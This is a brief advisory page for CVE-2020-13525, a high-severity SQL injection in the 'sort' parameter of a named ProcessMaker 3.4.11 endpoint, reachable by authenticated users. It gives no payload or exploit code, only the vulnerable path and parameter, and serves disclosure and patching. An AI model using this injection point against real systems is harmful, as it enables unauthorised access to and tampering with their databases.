SQL Injection Vulnerability in ProcessMaker 3.4.11: Exploiting the sort Parameter in /sysworkflow/en/neoclassic/reportTables/reportTables_Ajax

SQL Injection Vulnerability in ProcessMaker 3.4.11: Exploiting the sort Parameter in /sysworkflow/en/neoclassic/reportTables/reportTables_Ajax

CVE-2020-13525 · HIGH Severity

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

The sort parameter in the download page /sysworkflow/en/neoclassic/reportTables/reportTables_Ajax is vulnerable to SQL injection in ProcessMaker 3.4.11. A specially crafted HTTP request can cause an SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.

Learn more about our Cis Benchmark Audit For Microsoft Sql Server.